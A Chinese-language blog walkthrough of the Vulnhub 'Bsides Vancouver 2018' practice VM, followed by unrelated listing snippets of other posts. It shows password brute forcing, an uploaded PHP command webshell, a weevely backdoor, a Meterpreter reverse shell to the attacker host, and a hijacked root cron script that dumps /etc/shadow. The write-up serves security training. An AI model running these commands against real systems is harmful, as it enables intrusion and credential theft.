zhaji001

Vulnhub Bsides Vancouver 2018

简介：

靶机下载URL: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/#release

虚拟机需要使用Virtualbox 直接导入VM, 攻击机器使用kali linux 如果你为了方便可不使用桥接模式，直接设置VM和kali在同一IP即可。如果在环境中有太多的机器就不太好分辨目标IP。

0x001 信息收集

nmap -sn 192.168.2.1-254
#省略。。。。。
Nmap scan report for 192.168.2.117

也可以使用

nmap -A -T4 192.168.2.1/24

找到目标进行详细的扫描

nmap -A -T4 192.168.2.117 #可使用-Pn不进行ping 可加-oN 写入一个文件方便查看

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 65534    65534        4096 Mar 03  2018 public
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.2.112
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
|   2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_  256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

0x002 侦查

看到21可以匿名登录

ftp://192.168.2.117/

#查看
ftp://192.168.2.117/public/users.txt.bk
abatchy
john
mai
anne
doomguy

web服务

http://192.168.2.117/robots.txt
User-agent: *
Disallow: /backup_wordpress  #知道了这个web程序是使用的wordpress 查看这个目录

查看以上web的URL我们发现 /backup_wordpress这个目录是一个已弃用的wordpress博客备份

0x003 破解文件和目录

使用dirb 进行web目录的爬取

dirb http://192.168.2.117/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jan  2 16:28:23 2019
URL_BASE: http://192.168.2.117/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.2.117/ ----
+ http://192.168.2.117/cgi-bin/ (CODE:403|SIZE:289)                            
+ http://192.168.2.117/index (CODE:200|SIZE:177)                               
+ http://192.168.2.117/index.html (CODE:200|SIZE:177)                          
+ http://192.168.2.117/robots (CODE:200|SIZE:43)                               
+ http://192.168.2.117/robots.txt (CODE:200|SIZE:43)                           
+ http://192.168.2.117/server-status (CODE:403|SIZE:294)

0x004 wpscan

wpscan --url http://192.168.2.117//backup_wordpress/ --enumerate u


#省略信息 一大波
admin 和 john 是有效的用户 访问URL我们已经知道了有这两个用户存在

进后台尝试登录万能密码

http://192.168.2.117/backup_wordpress/wp-login.php

admin admin 123456之类的 若口令无效

跑字典比较慢太浪费时间 burp比这个好使多了

wpscan --url http://192.168.2.117/backup_wordpress --passwords /root/password.txt --usernames /root/username.txt

 john 密码 enigma

0x005 22 ssh端口登录

ftp提供一些用户名尝试登录看是否需要密钥

abatchy
john
mai
anne
doomguy

#只找到一个用户可以使用密码登录
ssh [email protected]
[email protected]'s password: 

hydra -l anne -P /usr/share/wordlists/rockyou.txt 192.168.2.117 ssh #总是出错，换个字典试下

login: anne   password: princess

ssh [email protected]
[email protected]'s password: 

anne@bsides2018:~$ id
uid=1003(anne) gid=1003(anne) groups=1003(anne),27(sudo)
root@bsides2018:~# ls -ll
total 4
-rw-r--r-- 1 root root 248 Mar  5  2018 flag.txt
root@bsides2018:~# cat flag.txt 
Congratulations!

If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!

There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?

@abatchy17


anne@bsides2018:~$ sudo -i
[sudo] password for anne:  #可以获取root权限
root@bsides2018:~#

0x006 web入口

john有管理员权限直接上传webshell Upload Plugin

";
      $cmd = ($_REQUEST['cmd']);
      exec($cmd, $results);
      foreach( $results as $r )
      {
              echo $r."
";
      }
      echo "

";
      die;
}
?>

文件命名为update.php

上传文件后提示无法安装

Appearance编辑把代码写进去

还可使用https://github.com/n00py/WPForce

我们点击Media 看到上传的文件了 add添加一个webshell

#https://github.com/epinna/weevely3/wiki
weevely generate 123456 shell.php
Generated 'shell.php' with password '123456' of 749 byte size.

上传文件在media中看到我们上传的后门程序直接点击查看路径

/backup_wordpress/wp-content/uploads/2019/01/shell.php

链接即可

weevely http://192.168.2.117/backup_wordpress/wp-content/uploads/2019/01/shell.php 123456

www-data@bsides2018:/var/www/backup_wordpress/wp-content/uploads/2019/01 $ pwd
/var/www/backup_wordpress/wp-content/uploads/2019/01
www-data@bsides2018:/var/www/backup_wordpress/wp-content/uploads/2019/01 $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bsides2018:/var/www/backup_wordpress/wp-content/uploads/2019/01 $

0x007 提取权限

www-data@bsides2018:/var/www/backup_wordpress $ ls -ll
total 184
-rw-r--r--  1 www-data www-data   418 Sep 24  2013 index.php
-rw-r--r--  1 www-data www-data 19935 Mar  5  2016 license.txt
-rw-r--r--  1 www-data www-data  7358 Dec  6  2015 readme.html
-rw-r--r--  1 www-data www-data  5032 Jan 27  2016 wp-activate.php
drwxr-xr-x  9 www-data www-data  4096 Apr 12  2016 wp-admin
-rw-r--r--  1 www-data www-data   364 Dec 19  2015 wp-blog-header.php
-rw-r--r--  1 www-data www-data  1476 Jan 30  2016 wp-comments-post.php
-rw-r--r--  1 www-data www-data  2853 Dec 16  2015 wp-config-sample.php
-rwxr-xr-x  1 www-data www-data  2930 Mar  7  2018 wp-config.php
drwxr-xr-x  5 www-data www-data  4096 Jan  2 02:37 wp-content
-rw-r--r--  1 www-data www-data  3286 May 24  2015 wp-cron.php
drwxr-xr-x 16 www-data www-data 12288 Apr 12  2016 wp-includes
-rw-r--r--  1 www-data www-data  2380 Oct 24  2013 wp-links-opml.php
-rw-r--r--  1 www-data www-data  3316 Nov  5  2015 wp-load.php
-rw-r--r--  1 www-data www-data 33837 Mar  5  2016 wp-login.php
-rw-r--r--  1 www-data www-data  7887 Oct  6  2015 wp-mail.php
-rw-r--r--  1 www-data www-data 13106 Feb 17  2016 wp-settings.php
-rw-r--r--  1 www-data www-data 28624 Jan 27  2016 wp-signup.php
-rw-r--r--  1 www-data www-data  4035 Nov 30  2014 wp-trackback.php
-rw-r--r--  1 www-data www-data  3061 Oct  2  2015 xmlrpc.php

查找密码

cat wp-config.php

/** The name of the database for WordPress */
define('DB_NAME', 'wp');

/** MySQL database username */
define('DB_USER', 'john@localhost');

/** MySQL database password */
define('DB_PASSWORD', 'thiscannotbeit');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

连接数据库

:sql_console -user john -passwd wp -host localhost
Access denied for user 'john'@'localhost' (using password: YES) 

#并不能链接到数据库

费时费力体力活

www-data@bsides2018:/var/www/backup_wordpress $ :audit_etcpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
colord:x:103:108:colord colour management daemon,,,:/var/lib/colord:/bin/false
lightdm:x:104:111:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:105:114::/nonexistent:/bin/false
avahi-autoipd:x:106:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:107:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/home/usbmux:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:122:RealtimeKit,,,:/proc:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
saned:x:114:123::/home/saned:/bin/false
mysql:x:115:125:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:116:126:ftp daemon,,,:/srv/ftp:/bin/false
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
abatchy:x:1000:1000:abatchy,,,:/home/abatchy:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/bash
mai:x:1002:1002:,,,:/home/mai:/bin/bash
anne:x:1003:1003:,,,:/home/anne:/bin/bash
doomguy:x:1004:1004:,,,:/home/doomguy:/bin/bash

0x008 msf

msfconsole -x "use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp; set LHOST 192.168.2.112; set PORT 4444; run"

weevely 运行Meterpreter会话

:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 192.168.2.112
[-][meterpreter] Make sure the listener is running on another terminal as below
msfconsole -x "use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp; set LHOST 192.168.2.112; set PORT 4444; run"

[*] Started reverse TCP handler on 192.168.2.112:4444 
[*] Sending stage (38247 bytes) to 192.168.2.117
[*] Meterpreter session 1 opened (192.168.2.112:4444 -> 192.168.2.117:53213) at 2019-01-02 20:40:24 +0800

meterpreter > sysinfo 
Computer    : bsides2018
OS          : Linux bsides2018 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686
Meterpreter : php/linux

0x009 LinEnum

git clone https://github.com/rebootuser/LinEnum.git

meterpreter > cd /tmp
meterpreter > ls -ll
Listing: /tmp
=============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
41777/rwxrwxrwx  4096  dir   2019-01-02 14:11:02 +0800  .ICE-unix
41777/rwxrwxrwx  4096  dir   2019-01-02 14:11:02 +0800  .X11-unix
40700/rwx------  4096  dir   2019-01-02 14:11:01 +0800  pulse-PKdhtXMmr18n

meterpreter > pwd
/tmp
meterpreter > upload /root/LinEnum/LinEnum.sh
[*] uploading  : /root/LinEnum/LinEnum.sh -> LinEnum.sh
[*] Uploaded -1.00 B of 44.51 KiB (-0.0%): /root/LinEnum/LinEnum.sh -> LinEnum.sh
[*] uploaded   : /root/LinEnum/LinEnum.sh -> LinEnum.sh
ls
LinEnum.sh
pulse-PKdhtXMmr18n
bash ./LinEnum.sh > LinEnum.log
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /usr/local/bin/cleanup
#最后一行/usr/local/bin/cleanup表示每分钟运行一次

meterpreter > ls -l /usr/local/bin/cleanup
100777/rwxrwxrwx  64  fil  2018-03-04 08:13:53 +0800  /usr/local/bin/cleanup

meterpreter > cp /usr/local/bin/cleanup /tmp/cleanup.bak
meterpreter > shell
Process 19069 created.
Channel 9 created.
echo "cat /etc/shadow > /tmp/etc_shadow.log" >> /usr/local/bin/cleanup
cat /usr/local/bin/cleanup
#!/bin/sh

rm -rf /var/log/apache2/*# Clean those damn logs!!
cat /etc/shadow > /tmp/etc_shadow.log

最多1分钟后，结果将显示在指定的文件中

cat /tmp/etc_shadow.log
root:!:17593:0:99999:7:::
daemon:*:16105:0:99999:7:::
bin:*:16105:0:99999:7:::
sys:*:16105:0:99999:7:::
sync:*:16105:0:99999:7:::
games:*:16105:0:99999:7:::
man:*:16105:0:99999:7:::
lp:*:16105:0:99999:7:::
mail:*:16105:0:99999:7:::
news:*:16105:0:99999:7:::
uucp:*:16105:0:99999:7:::
proxy:*:16105:0:99999:7:::
www-data:*:16105:0:99999:7:::
backup:*:16105:0:99999:7:::
。。。。。。。。。。。。。。

0x010 Cron jobs

meterpreter > cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /usr/local/bin/cleanup
#

#替换清理脚本

meterpreter > cp /usr/local/bin/cleanup /tmp/cleanup.bak
meterpreter > cp shell.sh /usr/local/bin/cleanup

稍等一下我们就拿到root权限了

msf exploit(multi/script/web_delivery) > sessions 

Active sessions
===============

  Id  Name  Type                   Information            Connection
  --  ----  ----                   -----------            ----------
  1         meterpreter php/linux  root (0) @ bsides2018  192.168.2.112:1111 -> 192.168.2.117:35045 (192.168.2.117)

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell 
Process 4277 created.
Channel 0 created.
id
uid=0(root) gid=0(root) groups=0(root)

由于运行的脚本Cron jobs每分钟运行一次,每分钟都会启动一个新的Meterpreter shell,要把它停掉

meterpreter > mv /tmp/cleanup.bak /usr/local/bin/cleanup

总结：

通过对此靶机的练习，学到了如果通过破解工具拿到root权限。在练习通过web作为入口拿到root权限，当然在真实的环境中，不会给出这么便捷的方式拿到root权限。练习靶机不但可以提高对工具的熟练程度，还可以练习不同的方式来获取shell和权限。知识的学习是不断累积的，还需继续练习学习原理。

CISP-PTE考试通关经验 Python_chichi 互联网职业发展科技 android
考试题型考试题型氛围选择题（20分）+基础题（50分）+综合题（三个key30分），70分以上通过，也就是选择题保证10分以上，基础题全做出来的话，至少要做出综合题第一道小题。一、选择题主要考察基础知识，前四天老师都有讲，另外还发了一些题库，看一遍的话，基本考10分以上问题不大。二、基础题1.sql注入第一题sql注入是一个文章发表系统，培训的时候靶机练习有做过，但是不太一样，注册用户登录之后，注
Gaara靶机练习郑居中3.0 Gaara靶机 gdb提权
渗透测试一.信息收集1.确定IP地址2.nmap扫描3.目录扫描二.hydra爆破1.ssh连接2.信息探索三.提权gdb提权提权一.信息收集1.确定IP地址┌──(root㉿kali)-[~/kali/web]└─#arp-scan-lInterface:eth0,type:EN10MB,MAC:00:0c:29:10:3c:9b,IPv4:192.168.9.10Startingarp-sca
Neos的渗透测试靶机练习——DarkHole-2 Dr.Neos 靶场练习渗透测试网络安全 sql git 服务器
DarkHole-2一、实验环境二、开始渗透1.搜集信息2.git文件泄露3.SQL注入4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DarkHole-2（网卡初始为仅主机模式，要有安全意识）靶机网卡有问题需要提前修改，进入系统前先按shift，然后按e进入编辑模式，将ro至initrd之前的内容修改为rwsing
Neos的渗透测试靶机练习——DarkHole-1 Dr.Neos 靶场练习网络安全渗透测试网络安全 web安全
DarkHole-1一、实验环境二、开始渗透1.搜集信息2.sql注入4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DarkHole-1（网卡初始为仅主机模式，要有安全意识）靶机网卡有问题需要提前修改，进入系统前先按shift，然后按e进入编辑模式，将ro至initrd之前的内容修改为rwsingleinit=/b
Neos的渗透测试靶机练习——DC-8 Dr.Neos 靶场练习网络服务器渗透测试安全网络安全
DC-8一、实验环境二、开始渗透1.搜集信息2.sql注入（1）测试注入点（4）sqlmap3.PHP上传，反弹shell4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-8（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身i
Neos的渗透测试靶机练习——DC-9 Dr.Neos 靶场练习网络服务器渗透测试安全网络安全
DC-9一、实验环境二、开始渗透1.搜集信息2.sql注入3.文件包含漏洞4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-9（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.16
Neos的渗透测试靶机练习——DC-7 Dr.Neos 靶场练习网络安全渗透测试网络安全 web安全
DC-7一、实验环境二、开始渗透1.搜集信息2.文件上传3.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-7（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.168.56.101。
Neos的渗透测试靶机练习——DC-5 Dr.Neos 靶场练习安全渗透测试网络安全 web安全网络
DC-5一、实验环境二、开始渗透1.搜集信息2.文件包含漏洞3.反弹shell三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-5（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.168.
Neos的渗透测试靶机练习——Wakanda Dr.Neos 靶场练习安全渗透测试网络安全 web安全
Wakanda一、实验环境二、开始渗透（根据流程学习思路）1.获知本机IP、靶机IP2.靶机端口、协议、前端信息（Nmap）3.进入后台，查看敏感数据三、总结一、实验环境虚拟机软件：VirtualBox攻击机：KaliLinux（仅主机模式）靶机：Wakanda（仅主机模式，共有3个flag）二、开始渗透（根据流程学习思路）1.获知本机IP、靶机IP切换到root用户（输入sudosu及对应的密码
Neos的渗透测试靶机练习——DC-3 Dr.Neos 靶场练习网络安全渗透测试网络安全 web安全
DC-3一、实验环境二、开始渗透1.搜集信息2.sqlmap3.上传PHP木马三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-3（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.168.
渗透测试-靶机DC-2-知识点总结 Dr.Neos 靶机-知识点总结安全渗透测试网络安全 web安全网络
靶机DC-2-知识点总结一、前言二、实验环境三、渗透测试工具1.cewl（1）cewl简介（2）cewl常见用法2.wpscan（1）wpscan简介（2）wpscan常见用法直接扫描-eu爆破用户名-U、-P爆破账户密码3.dirb（1）dirb简介（2）dirb常见用法四、渗透测试技巧1.rbash逃逸2.git提权五、总结一、前言本次渗透测试具体流程详见Neos的渗透测试靶机练习——DC-2
hackmyvm Rei靶机练习活着Viva hackmyvm 渗透测试
主机发现端口扫描漏洞挖掘权限提升主机发现攻击机ip靶机ip-sn发送arp请求包探测目标ip是否在线端口扫描-p-所有端口扫描-sV查询开放端口的服务这里65333是ssh服务，63777是http服务最好拿个记事本记住漏洞挖掘浏览靶机的默认页面，查查有什么漏洞它说indexp.txt在web的默认目录，那我访问一下。indexp.txt下显示了哪些目录可以访问，哪些目录不可以访问，类似于robo
vulnhub靶机练习-Os-hackNos Asson
0x01靶机简介Difficulty:EasytoIntermediateFlag:2FlagfirstuserAndsecondrootLearning:exploit|WebApplication|Enumeration|PrivilegeEscalationWebsite:www.hackNos.commail:[email protected]靶机下载https://www.vulnh
Linux靶机练习小小西贝 Linux Web安全靶机练习安全网络安全 linux
文章目录第1次Lampiao1.信息收集1.1netdiscover扫描1.2namp扫描第1次扫描第2次扫描1.3御剑扫描打开扫描到的文件打开登录网站sql注入链接跳转node/1node/3node/22.漏洞探测2.1利用cewl获取网站信息2.2ssh进行登录查看靶机信息：3.提权3.1利用脏牛提权3.2对40847文件的操作3.3tiago用户下载40847.cpp文件3.4获取root
靶机练习2之利用Linux版本内核漏洞实现本地权限提升 yuan_boss 保护国家网络安全 linux ubuntu 靶机本地权限提升漏洞 kali
文章目录信息收集1.扫描网段2.扫描敏感目录渗透阶段密码爆破查看主机内核查找版本漏洞查看漏洞详细信息拷贝漏洞到本地将漏洞文件传到靶机漏洞利用信息收集1.扫描网段建议开启两个终端，首尾扫描，提高速度与准确性从0开始扫描nmap10.9.136.0/24从后面开始扫描nmap-r10.9.136.0/24扫描完成后，发现有个主机10.9.136.231开放了80端口，直接访问该主机，发现只有一个图片，
Vulnhub-Raven1 靶机练习 GloryGod Vulnhub 网络安全网络安全
靶机地址：Raven:1~VulnHub1.基本信息Kali：192.168.26.131靶机：192.168.26.1362.信息收集arp-scan-l或者nmap-sn192.168.26.0/24之后进行全端口扫描，保证自己的隐蔽性（假设真实环境）nmap-sT--min-rate10000-p-192.168.26.136-oA./nmap_report/raven1/port紧接着进行
靶机练习 No.23 Vulnhub靶机DarkHole 2 .git信息泄露 .bash_history历史命令提权 LuckyCharm~ 靶机学习安全
靶机练习No.23Vulnhub靶机DarkHole20x00环境准备0x01信息收集步骤一：ip探测步骤二：端口扫描0x02漏洞挖掘思路一：web漏洞挖掘（.git信息收集）思路二：22ssh爆破步骤一：githack.py收集.git步骤二：从git仓库审查代码及数据库文件（1）config/config.php（2）审计index.phplogin.phpdashboard.php步骤三：g
【靶机练习】Vulnhub靶场Earth-练习记录小白帽的成长网络安全渗透测试 linux 服务器 centos
注：靶机开机前需要在虚拟机设置关闭USB，否则靶机无法打开信息收集攻击机IP：192.168.43.118主机发现：sudonmap-sP192.168.43.1/24确认目标机IP：192.168.43.241端口扫描：sudonmap-sC-sV-p-192.168.43.241扫描结果：目标机开了22端口和80端口，80端口中配置了两个DNS，需要修改hosts文件指定IP。没修改hosts
SQL注入靶机练习：BUU SQL COURSE 1 燕麦葡萄干渗透测试学习渗透测试 SQL注入 BUUCTF
SQL注入靶机练习：BUUSQLCOURSE1一、SQL注入知识点二、前置知识三、SQL注入测试的一般步骤四、解题过程一、SQL注入知识点可参考SQL注入详解二、前置知识参考来源：渗透攻防Web篇-深入浅出SQL注入mysql5.0以上版本中存在一个重要的系统数据库information_schema，通过此数据库可访问mysql中存在的数据库名、表名、字段名等元数据。information_sc
Vulnhub靶场-DC-1靶机练习 .风溪. DC靶机
Vulnhub-DC-1daoyuan##零、环境配置1、虚拟机：vmware15.5.62、攻击环境：kalilinux2020.3192.168.143.1283、靶机：DC-1靶机直接从虚拟机wmware中打开，注意将网络适配器改为nat模式。一、攻击过程一、主机存活扫描arp-scan-l探测到目标ip:192.168.143.134二、端口扫描namp-A-p-192.168.143.1
Vulnhub靶场-DC-2靶机练习 .风溪. DC靶机
Vulnhub-DC-2daoyuan零、环境配置1、虚拟机：vmware15.5.62、攻击环境：kalilinux2020.3192.168.143.1283、靶机：DC-2靶机直接从虚拟机wmware中打开，注意将网络适配器改为nat模式。一、信息收集1、主机存活扫描arp-scan-l2、端口扫描nmap-A-p-192.168.143.135发现开放的端口以及服务80wordpress7
JIS-CTF: VulnUpload 靶机练习 yemansleep
1.靶机介绍VM名称：JIS-CTF：VulnUpload难度：初学者说明：此机器上有五个标志。试着找到它们。平均需要1.5小时才能找到所有旗帜。2.信息收集2.1对靶机进行端口扫描，发现只有80，22端口开放image.png2.2查看网站的robots.txt发现有如下目录User-agent:*Disallow:/Disallow:/backupDisallow:/adminDisallow
做一个靶机练习_djinn 五行缺金 golang
前几天一直在背资料，背的很烦，找个靶机来玩玩.第一件事，先找一下主机地址，由于我在自己的局域网内，我不用扫也知道这台刚开的主机ip是多少...但如果不知道的话，可以用nmap检测一下,sS是指用半开放式扫描，不会完成三次握手，速度要快一点sudonmap-sS192.168.1.0/24扫描结果如下Nmapscanreportfordjinn(192.168.1.8)Hostisup(0.0001
做一个靶机练习_djinn 五行缺金 golang
前几天一直在背资料，背的很烦，找个靶机来玩玩.第一件事，先找一下主机地址，由于我在自己的局域网内，我不用扫也知道这台刚开的主机ip是多少...但如果不知道的话，可以用nmap检测一下,sS是指用半开放式扫描，不会完成三次握手，速度要快一点sudonmap-sS192.168.1.0/24扫描结果如下Nmapscanreportfordjinn(192.168.1.8)Hostisup(0.0001
渗透测试靶机练习（一）之lazysysadmin 不断积淀渗透测试
lzaysysadmin情报搜集主机发现，使用netdiscover主机扫描，使用nmap使用dirbuster进行网站目录扫描可以看到扫描结果，有workpress和phpmyadmin登录网站，查看robots.txt文件存在目录遍历漏洞，但是没有发现可用信息可以尝试爆破一下phpmyadmin的登录口令和wpscan扫描一下主机扫描中发现445端口共享文件发现三个共享的文件夹Linux下挂载
DC-5靶机练习水中煮鱼冒气靶机练习
DC-5靶机练习文件下载链接第一部分信息收集第一步信息收集第二步扫描开放的端口第三步访问80端口[打开Contact页面，发现是一个留言板块，在留言板块输入内容并提交]第四步：观察网页第二部分文件包含漏洞第一步：使用BurpSuite抓包，爆破后台页面[发现存在index.php，solutions.php，about-us.php，faq.php，contact.php，thankyou.php
靶机练习 - ATT&CK红队实战靶场 - 1. 环境搭建和漏洞利用 Sally_Zhang
最近某个公众号介绍了网上的一套环境，这个环境是多个Windows靶机组成的，涉及到内网渗透，正好Windows和内网渗透一直没怎么接触过，所以拿来学习下。下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/环境配置和检查加上kali一共四台虚拟机。win7x64需要配置两张网卡，一个在内网网段，一个在外网网段，配置如下(VM默认只有一张网卡，
Pikachu 通关笔记 BROTHERYY 靶场练习
Pikachu靶机练习1、暴力破解1.1基于表单的暴力破解1.2验证码绕过(onserver)1.3验证码绕过(onclient)1.4验证码绕过(token防爆破)2、Cross-SiteScripting-XSS2.1反射型(get)2.2反射型(post)2.3存储型xss2.4DOM型xss2.5DOM型xss-x2.6XSS之盲打2.7XSS之过滤2.8xss之htmlspecialch
DC-1入门练习 Mr H
**渗透测试入门靶机练习DC-1**大家好！第一次搭建自己的博客，对这个环境有点陌生，作为一名网络安全学习者很高兴为大家提供一些踩坑经验以及学习教程如有不足，或错误还请大家指点。#环境搭建1.首先准备好DC-1靶机，其实就是一个虚拟机ova文件下载地址：https://download.vulnhub.com/dc/DC-1.zip其他DC靶机地址只需修改上面DC-后面数字即可2.打开次虚拟机创建
LazySysAdmin 渗透靶机练习林家大公子渗透学习
下载链接：https://www.vulnhub.com/entry/lazysysadmin-1,205/扫描目标主机...省略输出有用的信息包括：http://x.x.x.x/phpmyadmin/http://x.x.x.x/wordpress/wp-adminhttp://x.x.x.x/wordpress/找到疑似用户名的：togie使用enum4linuxx.x.x.x，查找有用信息。
Spring的注解积累 yijiesuifeng spring 注解
用注解来向Spring容器注册Bean。需要在applicationContext.xml中注册： <context:component-scan base-package=”pagkage1[,pagkage2,…,pagkageN]”/>。如：在base-package指明一个包 <context:component-sc
传感器百合不是茶 android 传感器
android传感器的作用主要就是来获取数据,根据得到的数据来触发某种事件下面就以重力传感器为例; 1,在onCreate中获得传感器服务 private SensorManager sm;// 获得系统的服务 private Sensor sensor;// 创建传感器实例 @Override protected void
[光磁与探测]金吕玉衣的意义 comsci
这是一个古代人的秘密:现在告诉大家信不信由你们: 穿上金律玉衣的人,如果处于灵魂出窍的状态,可以飞到宇宙中去看星星这就是为什么古代
精简的反序打印某个数沐刃青蛟打印
以前看到一些让求反序打印某个数的程序。比如：输入123，输出321。记得以前是告诉你是几位数的，当时就抓耳挠腮，完全没有思路。似乎最后是用到%和/方法解决的。而今突然想到一个简短的方法，就可以实现任意位数的反序打印（但是如果是首位数或者尾位数为0时就没有打印出来了）代码如下： long num, num1=0;
PHP：6种方法获取文件的扩展名 IT独行者 PHP 扩展名
